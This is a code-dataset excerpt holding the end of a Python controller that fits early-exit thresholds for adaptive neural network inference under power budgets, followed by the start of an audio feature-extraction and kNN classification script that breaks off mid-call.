level_predictions = np.concatenate(level_predictions, axis=0)\n labels = np.concatenate(labels, axis=0).reshape(-1, 1)\n level_logits = np.concatenate(level_logits, axis=0)\n stop_outputs = np.concatenate(stop_outputs, axis=0)\n\n y = (level_predictions == labels).astype(float)\n print('Level Accuracy: {0}'.format(np.average(y, axis=0)))\n\n return states, y, level_logits, labels, stop_outputs\n\n\ndef levels_to_execute(logistic_probs: np.ndarray, thresholds: np.ndarray) -> np.ndarray:\n # Compute the predictions based on this threshold setting. The level predictions are a 0/1\n # array which is 0 when we should NOT use this level and 1 when we should\n expanded_thresholds = np.expand_dims(thresholds, axis=1) # [S, 1, L]\n level_predictions = (logistic_probs > expanded_thresholds).astype(int) # [S, B, L]\n\n # Based on these level predictions, we compute the number of levels for each batch sample\n level_idx = np.arange(start=0, stop=thresholds.shape[-1])\n mask = (1.0 - level_predictions) * BIG_NUMBER # Big number when incorrect, 0 when correct\n index_mask = mask + level_idx # [S, B, L]\n levels = np.min(index_mask, axis=-1) # [S, B]\n levels = np.minimum(levels, thresholds.shape[-1] - 1).astype(int) # Clip the output, [S, B]\n\n return levels\n\n\ndef adjust_thresholds(clf_predictions: np.ndarray, thresholds: np.ndarray, target_distribution: np.ndarray, precision: int) -> np.ndarray:\n fp_one = 1 << precision\n thresholds = np.copy(thresholds)\n num_levels = thresholds.shape[1]\n num_budgets = thresholds.shape[0]\n\n clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n for level in range(num_levels):\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=num_levels) for i in range(num_budgets)]) # [S, L]\n level_fractions = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n\n direction = 1 - 2 * (target_distribution[:, level] > level_fractions[:, level]).astype(float)\n\n i = 0\n while (direction * (target_distribution[:, level] - level_fractions[:, level]) <= 0).all() and i < fp_one:\n thresholds[:, level] += (direction / fp_one)\n thresholds = np.clip(thresholds, a_min=0, a_max=1)\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n\n # Compute the approximate power and accuracy\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=num_levels) for i in range(num_budgets)]) # [S, L]\n level_fractions = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n i += 1\n\n thresholds[:, level] -= (direction / fp_one)\n final_levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = np.vstack([np.bincount(final_levels[i, :], minlength=num_levels) for i in range(num_budgets)]) # [S, L]\n final_distribution = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n\n return thresholds\n\n\ndef level_errors(logistic_probs: np.ndarray, thresholds: np.ndarray, network_predictions: np.ndarray) -> np.ndarray:\n \"\"\"\n Calculates the distribution of threshold errors for each model level. This is used purely for debugging.\n\n Args:\n logistic_probs: A [1, B, L] array of logistic regression probabilities.\n thresholds: A [S, L] array of learned thresholds\n network_predictions: A [1, B, L] array of 0/1 classifications for each level.\n \"\"\"\n expanded_thresholds = np.expand_dims(thresholds, axis=1) # [S, 1, L]\n level_diff = logistic_probs - expanded_thresholds # [S, B, L]\n\n levels = levels_to_execute(logistic_probs, thresholds) # [S, B]\n\n for budget_idx, budget_thresholds in enumerate(thresholds): # [S]\n print(budget_thresholds)\n for level in range(thresholds.shape[1] - 1): # [L]\n is_incorrect = (1.0 - network_predictions[:, level]) # [B]\n is_correct = network_predictions[:, level] # [B]\n prob_diff = level_diff[budget_idx, :, level] # [B]\n chosen_levels = (levels[budget_idx, :] == level).astype(float) # [B]\n\n logistic_variance = np.square(np.std(logistic_probs[:, level]))\n logistic_avg = np.average(logistic_probs[:, level])\n\n incorrect_mask = is_incorrect * chosen_levels\n incorrect_diff = incorrect_mask * prob_diff\n avg_inc_diff = np.sum(incorrect_diff) / np.maximum(np.sum(incorrect_mask), SMALL_NUMBER)\n\n correct_mask = is_correct * chosen_levels\n correct_diff = correct_mask * prob_diff\n avg_cor_diff = np.sum(correct_diff) / np.maximum(np.sum(correct_mask), SMALL_NUMBER)\n\n print('Average Gap on Level {0}: Incorrect -> {1:.5f}, Correct -> {2:.5f}, Prob Avg (Var): {3:.5f} ({4:.5f})'.format(level, avg_inc_diff, avg_cor_diff, logistic_avg, logistic_variance))\n\n\ndef predictions_for_levels(model_predictions: np.ndarray, levels: np.ndarray, batch_idx: np.ndarray) -> np.ndarray:\n preds_per_sample: List[np.ndarray] = []\n for i in range(levels.shape[0]):\n level_pred = np.squeeze(model_predictions[batch_idx, levels[i, :]])\n preds_per_sample.append(level_pred)\n\n preds_per_sample = np.vstack(preds_per_sample) # [S, B]\n return preds_per_sample\n\n\ndef fit_anneal_rate(start_value: float, end_value: float, steps: int):\n return np.exp((1.0 / steps) * np.log(np.max(end_value, SMALL_NUMBER) / np.max(start_value, SMALL_NUMBER)))\n\n\n### Budget optimizer classes ###\n\nclass BudgetOptimizer:\n \n def __init__(self, num_levels: int, budgets: np.ndarray, precision: int, trials: int, max_iter: int, min_iter: int, patience: int, power: np.ndarray):\n self._num_levels = num_levels\n self._num_budgets = budgets.shape[0]\n self._budgets = budgets\n self._precision = precision\n self._trials = trials\n self._max_iter = max_iter\n self._patience = patience\n self._rand = np.random.RandomState(seed=42)\n self._thresholds = None\n self._min_iter = min_iter\n self._power = power\n\n def fit(self, network_predictions: np.ndarray, clf_predictions: np.ndarray) -> np.ndarray:\n raise NotImplementedError()\n\n def evaluate(self, network_predictions: np.ndarray, clf_predictions: np.ndarray) -> np.ndarray:\n raise NotImplementedError()\n\n def get_approx_power(self, levels: np.ndarray) -> np.ndarray:\n \"\"\"\n Approximates the power consumption given profiled power results.\n\n Args:\n levels: A [S, B] array of the levels for each sample (B) and budget (S)\n Returns:\n An [S] array containing the average power consumption for each budget thresholds.\n \"\"\"\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=self._num_levels) for i in range(self._num_budgets)]) # [S, L]\n normalized_level_counts = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n approx_power = np.sum(normalized_level_counts * self._power, axis=-1).astype(float) # [S]\n return approx_power, normalized_level_counts\n\n\nclass SimulatedAnnealingOptimizer(BudgetOptimizer):\n\n def __init__(self, num_levels: int, budgets: np.ndarray, precision: int, trials: int, max_iter: int, patience: int, temp: float, anneal_rate: float):\n super().__init__(num_levels, budgets, precision, trials, max_iter, patience)\n self._max_iter = max_iter\n self._temp = temp\n self._anneal_rate = anneal_rate\n\n def fit(self, network_results: np.ndarray, clf_predictions: np.ndarray):\n # Expand the clf predictions for later broadcasting\n clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n # Initialize thresholds, [S, L] array\n thresholds = round_to_precision(self._rand.uniform(low=0.2, high=0.8, size=(self._num_budgets, self._num_levels)), self._precision)\n thresholds = np.flip(np.sort(thresholds, axis=-1), axis=-1)\n thresholds[:, -1] = 0\n\n # The number 1 in fixed point representation\n fp_one = 1 << self._precision\n\n # Array of level indices\n level_idx = np.arange(start=0, stop=self._num_levels).reshape(1, 1, -1) # [1, 1, L]\n batch_idx = np.arange(start=0, stop=clf_predictions.shape[1]) # [B]\n\n # Variable for convergence\n early_stopping_counter = 0\n\n best_fitness = np.zeros(shape=(self._num_budgets,), dtype=float)\n best_power = np.zeros_like(best_fitness)\n margin = 0.4\n temp = self._temp\n\n for i in range(self._max_iter):\n prev_thresholds = np.copy(thresholds)\n \n # Generate a random move\n random_move = round_to_precision(self._rand.uniform(low=-margin, high=margin, size=thresholds.shape), self._precision)\n random_move[:, -1] = 0\n\n candidate_thresholds = np.clip(thresholds + random_move, a_min=0, a_max=1)\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=candidate_thresholds)\n\n # Compute the approximate power and accuracy\n approx_power, _ = self.get_approx_power(levels=levels)\n dual_term = approx_power - self._budgets # [S]\n dual_penalty = np.where(dual_term > 0, VIOLATION_FACTOR * dual_term, -UNDERSHOOT_FACTOR * dual_term)\n\n correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n accuracy = np.average(correct_per_level, axis=-1) # [S]\n\n # Compute the fitness (we aim to maximize this objective)\n fitness = accuracy - dual_penalty\n\n # Determine when to set thresholds based on fitness and temperature\n random_move_prob = self._rand.uniform(low=0.0, high=1.0, size=(self._num_budgets, ))\n fitness_diff = fitness - best_fitness # [S]\n temperature_prob = np.exp(-1 * fitness_diff / temp)\n\n selection = np.logical_or(fitness_diff > 0, temperature_prob > random_move_prob)\n best_fitness = np.where(selection, fitness, best_fitness)\n best_power = np.where(selection, approx_power, best_power)\n thresholds = np.where(selection, candidate_thresholds, thresholds)\n\n # Anneal the temperature\n temp = temp * self._anneal_rate\n\n print('Completed iteration {0}: Fitness -> {1}'.format(i+1, best_fitness))\n\n if np.isclose(thresholds, prev_thresholds).all():\n early_stopping_counter += 1\n else:\n early_stopping_counter = 0\n\n if early_stopping_counter >= self._patience:\n print('Converged.')\n break\n\n return thresholds\n\n\nclass CoordinateOptimizer(BudgetOptimizer):\n\n def fitness_function(self, thresholds: np.ndarray, network_results: np.ndarray, clf_predictions: np.ndarray, batch_size: int, violation_factor: float, undershoot_factor: float):\n # Compute the number of levels to execute\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds) # [B]\n\n # Compute the approximate power\n approx_power, normalized_level_counts = self.get_approx_power(levels=levels)\n dual_term = approx_power - self._budgets # [S]\n dual_penalty = np.where(dual_term > 0, violation_factor, undershoot_factor) * np.square(dual_term)\n\n # Compute the accuracy\n batch_idx = np.arange(start=0, stop=batch_size) # [B]\n correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n\n accuracy = np.average(correct_per_level, axis=-1) # [S]\n\n return -accuracy + dual_penalty, approx_power\n\n def fit(self, network_results: np.ndarray, clf_predictions: np.ndarray):\n best_thresholds = np.ones(shape=(self._num_budgets, self._num_levels))\n best_fitness = np.ones(shape=(self._num_budgets, 1), dtype=float)\n\n # Reshape the validation arrays\n valid_clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n for t in range(self._trials):\n print('===== Starting Trial {0} ====='.format(t))\n\n init_thresholds = np.random.uniform(low=MIN_INIT, high=MAX_INIT, size=(self._num_budgets, self._num_levels))\n init_thresholds = round_to_precision(init_thresholds, self._precision)\n init_thresholds = np.flip(np.sort(init_thresholds, axis=-1), axis=-1) # [S, L]\n\n thresholds = self.fit_single(network_results=network_results,\n clf_predictions=clf_predictions,\n init_thresholds=init_thresholds)\n\n # Compute the fitness\n fitness, _ = self.fitness_function(thresholds=thresholds,\n network_results=network_results,\n clf_predictions=valid_clf_predictions,\n batch_size=valid_clf_predictions.shape[1],\n violation_factor=VIOLATION_FACTOR,\n undershoot_factor=UNDERSHOOT_FACTOR)\n fitness = np.expand_dims(fitness, axis=1)\n\n best_thresholds = np.where(fitness < best_fitness, thresholds, best_thresholds)\n best_fitness = np.where(fitness < best_fitness, fitness, best_fitness)\n print('Completed Trial {0}. Best Fitness: {1}'.format(t, best_fitness))\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=self._num_levels) for i in range(self._num_budgets)]) # [S, L]\n avg_level_counts = level_counts / np.sum(level_counts, axis=-1, keepdims=True)\n\n self._thresholds = best_thresholds\n return best_thresholds, avg_level_counts\n\n def print_accuracy_for_levels(self, clf_predictions: np.ndarray, network_results: np.ndarray, thresholds: np.ndarray):\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=self._num_levels) for i in range(self._num_budgets)]) # [S, L]\n avg_level_counts = level_counts / np.sum(level_counts, axis=-1, keepdims=True)\n\n batch_idx = np.arange(levels.shape[1]) # [B]\n correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n\n print('Level Counts: {0}'.format(avg_level_counts))\n\n # Calculate the accuracy for each level\n for i in range(self._num_levels):\n level_mask = (levels == i).astype(float) # [S, B]\n level_correct = np.sum(correct_per_level * level_mask, axis=-1) # [S]\n level_accuracy = level_correct / (np.sum(level_mask, axis=-1) + SMALL_NUMBER) # [S]\n\n print('Accuracy when stopping at level {0}: {1}'.format(i, level_accuracy))\n\n def evaluate(self, network_results: np.ndarray, clf_predictions: np.ndarray) -> np.ndarray:\n \"\"\"\n Evaluates the already-fitted thresholds on the given data points.\n \"\"\"\n assert self._thresholds is not None, 'Must fit the optimizer first'\n\n # Compute the number of levels to execute per sample\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=self._thresholds)\n\n # Compute the accuracy for each budget\n batch_size = network_results.shape[0]\n batch_idx = np.arange(start=0, stop=batch_size) # [B]\n correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n\n accuracy = np.average(correct_per_level, axis=-1) # [S]\n\n return accuracy\n\n def fit_single(self, network_results: np.ndarray, clf_predictions: np.ndarray, init_thresholds: np.ndarray) -> np.ndarray:\n \"\"\"\n Fits the optimizer to the given predictions of the logistic regression model and neural network model.\n\n Args:\n network_results: A [B, L] array of results for each sample and level in the neural network. The results\n are 0/1 values indicating if this sample was classified correctly (1) or incorrectly (0)\n clf_predictions: A [B, L] array of classifications by the logistic regression model.\n patience: Number of trials without change to detect convergence.\n \"\"\"\n # Expand the clf predictions for later broadcasting\n clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n # Copy the initial thresholds, [S, L] array\n thresholds = np.copy(init_thresholds)\n thresholds[:, -1] = 0\n\n # The number 1 in fixed point representation\n fp_one = 1 << self._precision\n\n # Variable for convergence\n early_stopping_counter = 0\n prev_thresholds = np.copy(thresholds)\n\n # best_fitness = np.ones(shape=(self._num_budgets,), dtype=float)\n # best_power = np.zeros_like(best_fitness)\n\n # Initialize penalty parameters\n violation_factor = 1e-4\n entropy_factor = 1e-4\n undershoot_factor = 1e-4\n\n violation_anneal_rate = fit_anneal_rate(start_value=violation_factor, end_value=VIOLATION_FACTOR, steps=self._min_iter)\n undershoot_anneal_rate = fit_anneal_rate(start_value=undershoot_factor, end_value=UNDERSHOOT_FACTOR, steps=self._min_iter)\n\n for i in range(self._max_iter):\n\n # Select a random level to run\n level = self._rand.randint(low=0, high=self._num_levels - 1)\n\n # [S] array of threshold values\n best_t = np.copy(thresholds[:, level]) # The 'best' are the previous thresholds at this level\n best_fitness = np.ones(shape=(self._num_budgets,), dtype=float)\n best_power = np.zeros_like(best_fitness)\n \n # Create the start values to enable a interval of size [MARGIN] within [0, 1]\n fp_init = (best_t * fp_one).astype(int)\n end_values = np.minimum(fp_init + int((MARGIN + 1) / 2), fp_one)\n start_values = np.maximum(end_values - MARGIN, 0)\n\n # start_values = np.maximum((best_t * fp_one).astype(int) - int(MARGIN / 2), 0)\n\n # Variables for tie-breaking\n steps = np.zeros_like(best_fitness)\n prev_level_fitness = np.ones_like(best_fitness)\n prev_level_approx_power = np.zeros_like(best_power)\n current_thresholds = np.zeros_like(best_t) # [S]\n\n # print('Starting threshold: {0}'.format(best_t))\n\n for offset in range(MARGIN):\n\n # Compute the predictions using the threshold on the logistic regression model\n candidate_values = np.minimum((start_values + offset) / fp_one, 1)\n thresholds[:, level] = candidate_values\n\n # Compute the fitness\n fitness, approx_power = self.fitness_function(thresholds=thresholds,\n network_results=network_results,\n clf_predictions=clf_predictions,\n batch_size=clf_predictions.shape[1],\n violation_factor=violation_factor,\n undershoot_factor=undershoot_factor)\n\n # print('Fitness: {0}, Candidate Value: {1}'.format(fitness, candidate_values))\n\n # Initialize variables on first iteration\n #if offset == 0:\n # prev_level_fitness = np.copy(fitness)\n # prev_level_approx_power = np.copy(approx_power)\n # current_thresholds = np.copy(thresholds[:, level])\n\n ## Set the best values at inflection points in the fitness\n #offset_condition = np.full(shape=fitness.shape, fill_value=(offset == MARGIN - 1 or offset == 0))\n #is_fitness_same = np.isclose(prev_level_fitness, fitness)\n\n #should_set = np.logical_and(prev_level_fitness <= best_fitness, \\\n # np.logical_or(np.logical_not(is_fitness_same), offset_condition))\n\n #median_thresholds = np.clip(current_thresholds + ((0.5 * steps).astype(int) / fp_one), a_min=0.0, a_max=1.0)\n #best_t = np.where(should_set, median_thresholds, best_t) # Set the thresholds to the median amount\n #best_power = np.where(should_set, prev_level_approx_power, best_power)\n #best_fitness = np.where(should_set, prev_level_fitness, best_fitness)\n\n ## If the fitness is equal to the previous fitness, then we add to the steps.\n ## Otherwise, we reset.\n #steps = np.where(np.isclose(prev_level_fitness, fitness), steps + 1, 0)\n\n ## Reset variables\n #current_thresholds = np.where(np.logical_not(is_fitness_same), thresholds[:, level], current_thresholds)\n #prev_level_fitness = np.copy(fitness)\n #prev_level_approx_power = np.copy(approx_power)\n\n best_t = np.where(fitness < best_fitness, candidate_values, best_t)\n best_power = np.where(fitness < best_fitness, approx_power, best_power)\n best_fitness = np.where(fitness < best_fitness, fitness, best_fitness)\n\n thresholds[:, level] = best_t # Set the best thresholds\n print('Completed Iteration: {0}: level {1}'.format(i, level))\n print('\\tBest Fitness: {0}'.format(-1 * best_fitness))\n print('\\tApprox Power: {0}'.format(best_power))\n # print('\\tThresholds: {0}'.format(thresholds))\n\n if i >= self._min_iter and (np.isclose(thresholds, prev_thresholds)).all():\n early_stopping_counter += 1\n else:\n early_stopping_counter = 0\n\n if early_stopping_counter >= self._patience:\n print('Converged.')\n break\n\n if i < self._min_iter:\n violation_factor = violation_factor * violation_anneal_rate\n undershoot_factor = undershoot_factor * undershoot_anneal_rate\n\n prev_thresholds = np.copy(thresholds)\n\n return thresholds\n\n\n### Model Controllers ###\n\nclass Controller:\n\n def __init__(self, model_path: str,\n dataset_folder: str,\n share_model: bool,\n precision: int,\n budgets: List[float],\n trials: int,\n power: np.ndarray,\n budget_optimizer_type: str,\n patience: int,\n max_iter: int,\n min_iter: int):\n self._model_path = model_path\n self._dataset_folder = dataset_folder\n\n # Load the model and dataset\n model, dataset, _ = get_serialized_info(model_path, dataset_folder=dataset_folder)\n\n self._model = model\n self._dataset = dataset\n self._is_fitted = False\n self._share_model = share_model\n self._num_levels = model.num_outputs\n\n self._budgets = np.array(budgets)\n self._num_budgets = len(self._budgets)\n self._precision = precision\n self._trials = trials\n self._thresholds = None\n self._patience = patience\n self._max_iter = max_iter\n self._min_iter = min_iter\n\n self._power = get_power_for_levels(power, self._num_levels)\n\n # Create the budget optimizer\n self._budget_optimizer_type = budget_optimizer_type.lower()\n if self._budget_optimizer_type == 'coordinate':\n self._budget_optimizer = CoordinateOptimizer(num_levels=self._num_levels,\n budgets=self._budgets,\n precision=self._precision,\n trials=self._trials,\n patience=patience,\n max_iter=max_iter,\n min_iter=min_iter,\n power=self._power)\n elif self._budget_optimizer_type == 'sim-anneal':\n self._budget_optimizer = SimulatedAnnealingOptimizer(num_levels=self._num_levels,\n budgets=self._budgets,\n precision=self._precision,\n trials=self._trials,\n temp=0.1,\n anneal_rate=0.95,\n patience=patience,\n max_iter=max_iter,\n min_iter=min_iter,\n power=self._power)\n else:\n raise ValueError('Unknown budget optimizer: {0}'.format(budget_optimizer_type))\n\n def fit(self, series: DataSeries):\n X_train, y_train, train_logits, train_labels, clf_predictions = fetch_model_states(self._model, self._dataset, series=series)\n X_test, y_test, test_logits, test_labels, test_clf_predictions = fetch_model_states(self._model, self._dataset, series=DataSeries.TEST)\n\n # Fit the thresholds\n self._thresholds, self._avg_level_counts = self._budget_optimizer.fit(network_results=y_train, clf_predictions=clf_predictions)\n \n # Evaluate the model optimizer\n print('======')\n train_acc = self._budget_optimizer.evaluate(network_results=y_train, clf_predictions=clf_predictions)\n test_acc = self._budget_optimizer.evaluate(network_results=y_test, clf_predictions=test_clf_predictions)\n\n print('Train Accuracy: {0}'.format(train_acc))\n self._budget_optimizer.print_accuracy_for_levels(network_results=y_train, clf_predictions=clf_predictions, thresholds=self._thresholds)\n # level_errors(clf_predictions, self._thresholds, y_train)\n\n print('Test Accuracy: {0}'.format(test_acc))\n self._budget_optimizer.print_accuracy_for_levels(network_results=y_test, clf_predictions=test_clf_predictions, thresholds=self._thresholds)\n # level_errors(test_clf_predictions, self._thresholds, y_test)\n\n print('=====')\n\n # adjusted_thresholds = adjust_thresholds(test_clf_predictions, thresholds=self._thresholds, precision=self._precision, target_distribution=self._avg_level_counts)\n # print('Adjusted Test Accuracy:')\n # self._budget_optimizer.print_accuracy_for_levels(network_results=y_test, clf_predictions=test_clf_predictions, thresholds=adjusted_thresholds)\n\n self._is_fitted = True\n\n def score(self, series: DataSeries) -> np.ndarray:\n assert self._is_fitted, 'Model is not fitted'\n X, y, _, _, clf_predictions = fetch_model_states(self._model, self._dataset, series=series)\n\n if self._share_model:\n X = X.reshape(-1, X.shape[-1])\n y = y.reshape(-1)\n\n accuracy = self._clf.score(X, y)\n else:\n total_accuracy = 0.0\n for level in range(self._model.num_outputs):\n total_accuracy += self._clf[level].score(X[:, level, :], y[:, level])\n\n accuracy = total_accuracy / self._model.num_outputs\n\n return accuracy\n\n def get_thresholds(self, budget: int) -> np.ndarray:\n budget_idx = index_of(self._budgets, value=budget)\n assert budget_idx >= 0, 'Could not find values for budget {0}'.format(budget)\n\n return self._thresholds[budget_idx]\n\n def get_avg_level_counts(self, budget: int) -> np.ndarray:\n budget_idx = index_of(self._budgets, value=budget)\n assert budget_idx >= 0, 'Could not find values for budget {0}'.format(budget)\n\n return self._avg_level_counts[budget_idx]\n\n def predict_sample(self, inputs: np.ndarray, budget: int, thresholds: Optional[np.ndarray] = None) -> int:\n \"\"\"\n Predicts the number of levels given the list of hidden states. The states are assumed to be in order.\n\n Args:\n inputs: An array of inputs for this sequence\n budget: The budget to perform inference under. This controls the employed thresholds.\n thresholds: Optional set of thresholds to use. This argument overrides the inferred thresholds.\n Returns:\n The number of levels to execute.\n \"\"\"\n assert self._is_fitted, 'Model is not fitted'\n\n # Get thresholds for this budget\n if thresholds is None:\n # Infer the thresholds for this budget\n thresholds = self.get_thresholds(budget)\n\n stop_output_ops = ['stop_output_{0}'.format(i) for i in range(self._model.num_outputs)]\n \n # Create the input feed dict\n seq_length = self._model.metadata[SEQ_LENGTH]\n num_sequences = self._model.num_sequences\n samples_per_seq = int(seq_length / num_sequences)\n feed_dict = dict()\n for i in range(self._model.num_outputs):\n input_ph = self._model.placeholders[get_input_name(i)]\n if self._model.model_type in (AdaptiveModelType.SAMPLE, AdaptiveModelType.BIDIR_SAMPLE, AdaptiveModelType.ADAPTIVE_NBOW):\n seq_indexes = list(range(i, seq_length, num_sequences))\n sample_tensor = inputs[seq_indexes]\n feed_dict[input_ph] = np.expand_dims(sample_tensor, axis=0) # Make batch size 1\n else: # Cascade\n start, end = i * samples_per_seq, (i+1) * samples_per_seq\n sample_tensor = inputs[start:end]\n feed_dict[input_ph] = np.expand_dims(sample_tensor, axis=0) # Make batch size 1\n\n # Supply dropout (needed for Adaptive NBOW)\n feed_dict[self._model.placeholders[DROPOUT_KEEP_RATE]] = 1.0\n\n model_result = self._model.execute(ops=stop_output_ops, feed_dict=feed_dict)\n for level, op_name in enumerate(stop_output_ops):\n stop_prob = model_result[op_name]\n\n if thresholds[level] < stop_prob:\n return level\n\n # By default, we return the top level\n return self._num_levels - 1\n\n def predict_levels(self, series: DataSeries, budget: float) -> Tuple[np.ndarray, np.ndarray]:\n assert self._is_fitted, 'Model is not fitted'\n\n budget_idx = index_of(self._budgets, value=budget)\n assert budget_idx >= 0, 'Could not find values for budget {0}'.format(budget)\n\n X, ypred, logits, _, clf_predictions = fetch_model_states(self._model, self._dataset, series=series)\n level_predictions = np.argmax(logits, axis=-1) # [B, L]\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=self._thresholds)\n\n batch_idx = np.arange(level_predictions.shape[0])\n predictions = predictions_for_levels(model_predictions=level_predictions,\n levels=levels,\n batch_idx=batch_idx)\n\n return levels[budget_idx].astype(int), predictions[budget_idx].astype(int)\n\n def as_dict(self):\n return {\n 'budgets': self._budgets,\n 'thresholds': self._thresholds,\n 'trials': self._trials,\n 'is_fitted': self._is_fitted,\n 'model_path': self._model_path,\n 'dataset_folder': self._dataset_folder,\n 'share_model': self._share_model,\n 'precision': self._precision,\n 'patience': self._patience,\n 'max_iter': self._max_iter,\n 'min_iter': self._min_iter,\n 'budget_optimizer_type': self._budget_optimizer_type,\n 'avg_level_counts': self._avg_level_counts\n }\n\n def save(self, output_file: Optional[str] = None):\n \"\"\"\n Serializes the model into a pickle file.\n \"\"\"\n # Create a default file name if none is given\n if output_file is None:\n save_folder, model_path = os.path.split(self._model_path)\n model_name = extract_model_name(model_path)\n output_file = os.path.join(save_folder, CONTROLLER_PATH.format(model_name))\n\n # Save the model components\n save_pickle_gz(self.as_dict(), output_file)\n\n @classmethod\n def load(cls, save_file: str):\n \"\"\"\n Loads the controller from the given serialized file.\n \"\"\"\n # Load the serialized information.\n serialized_info = read_pickle_gz(save_file)\n\n # Initialize the new controller\n controller = Controller(model_path=serialized_info['model_path'],\n dataset_folder=serialized_info['dataset_folder'],\n share_model=serialized_info['share_model'],\n precision=serialized_info['precision'],\n budgets=serialized_info['budgets'],\n trials=serialized_info['trials'],\n budget_optimizer_type=serialized_info['budget_optimizer_type'],\n patience=serialized_info.get('patience', 10),\n max_iter=serialized_info.get('max_iter', 100),\n min_iter=serialized_info.get('min_iter', 20),\n power=POWER)\n\n # Set remaining fields\n controller._thresholds = serialized_info['thresholds']\n controller._avg_level_counts = serialized_info['avg_level_counts']\n controller._is_fitted = serialized_info['is_fitted']\n\n return controller\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--model-paths', type=str, nargs='+')\n parser.add_argument('--dataset-folder', type=str)\n parser.add_argument('--budgets', type=float, nargs='+')\n parser.add_argument('--precision', type=int, required=True)\n parser.add_argument('--trials', type=int, default=3)\n parser.add_argument('--patience', type=int, default=15)\n parser.add_argument('--max-iter', type=int, default=100)\n parser.add_argument('--min-iter', type=int, default=20)\n parser.add_argument('--budget-optimizer', type=str, choices=['coordinate', 'sim-anneal'])\n args = parser.parse_args()\n\n for model_path in args.model_paths:\n print('Starting model at {0}'.format(model_path))\n\n # Create the adaptive model\n controller = Controller(model_path=model_path,\n dataset_folder=args.dataset_folder,\n share_model=False,\n precision=args.precision,\n budgets=args.budgets,\n trials=args.trials,\n power=POWER,\n budget_optimizer_type=args.budget_optimizer,\n patience=args.patience,\n max_iter=args.max_iter,\n min_iter=args.min_iter)\n \n # Fit the model on the validation set\n controller.fit(series=DataSeries.VALID)\n controller.save()\n\n # print('Validation Accuracy: {0:.5f}'.format(controller.score(series=DataSeries.VALID))) \n # print('Test Accuracy: {0:.5f}'.format(controller.score(series=DataSeries.TEST)))\n","sub_path":"src/controllers/logistic_regression_controller.py","file_name":"logistic_regression_controller.py","file_ext":"py","file_size_in_byte":39966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"536255893","text":"import window\nimport sklearn.model_selection\nimport scipy.io.wavfile\nimport numpy as np\n\nimport scipy.fftpack, scipy.signal\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport scipy.io, scipy.io.wavfile, scipy.stats\nimport sklearn.metrics\n\n# possible feature transforms\n# you don't know what these do, but you can try applying them\n# and see how they affect the visualisations\nfeature_fns = {\n \"dct\": lambda x: np.abs(scipy.fftpack.dct(x)),\n \"fft\": lambda x: np.abs(scipy.fftpack.fft(x)),\n \"fft_phase\": lambda x: np.angle(scipy.fftpack.fft(x)),\n \"dct_phase\": lambda x: np.angle(scipy.fftpack.dct(x)),\n \"cepstrum\": lambda x: np.abs(\n scipy.fftpack.ifft(np.log(np.abs(scipy.fftpack.fft(x)) ** 2 + 1e-4))\n )\n ** 2,\n \"raw\": lambda x: x,\n}\n\n# possible windowing functions\nwindow_fns = {\n \"hamming\": scipy.signal.hamming,\n \"hann\": scipy.signal.hann,\n \"boxcar\": scipy.signal.boxcar,\n \"blackmanharris\": scipy.signal.blackmanharris,\n}\n\n\ndef load_wav(fname):\n sr, wave = scipy.io.wavfile.read(fname)\n return wave / 32768.0\n\n\ndef load_features_window(data, size, step, window_fn, feature_fn, label, feature_range, decimate):\n\n features = window.window_data(data, size=size, step=step)\n labels = np.full(len(features), label)\n print(f\"Loading into {len(features)} windows of length {size}\")\n\n fn = feature_fns[feature_fn]\n start_range = int(feature_range[0] * features.shape[1])\n end_range = int(feature_range[1] * features.shape[1])\n win = window_fns[window_fn](features.shape[1])\n # apply feature transform and window fn\n X = [fn(feature * win)[start_range:end_range:decimate] for feature in features]\n X = np.array(X)\n return X, labels\n\n\ndef load_data(kwargs):\n X = []\n y = []\n for i in range(5):\n fname = f\"data/challenge_train_{i}.wav\"\n wave_data = load_wav(fname)\n features, labels = load_features_window(\n data=wave_data,\n size=kwargs['size'],\n step=kwargs['step'],\n window_fn=kwargs['window_fn'],\n feature_fn=kwargs['feature_fn'],\n label=i,\n feature_range=kwargs[\"feature_range\"],\n decimate=kwargs[\"decimate\"]\n )\n X.append(features)\n y.append(labels)\n\n X = np.concatenate(X, axis=0)\n y = np.concatenate(y, axis=0)\n print(f\"Using {kwargs['feature_fn']} transform and a {kwargs['window_fn']} window.\") \n return X, y\n\nimport sklearn.neighbors\n\n\ndef knn_fit(X, y):\n knn = sklearn.neighbors.KNeighborsClassifier(n_neighbors=7)\n knn.fit(X=X, y=y)\n return knn\n\n\ndef knn_classify(knn, wave_data, kwargs):\n \n features, _ = load_features_window(\n data=wave_data,\n size=kwargs['size'],\n step=kwargs['step'],\n 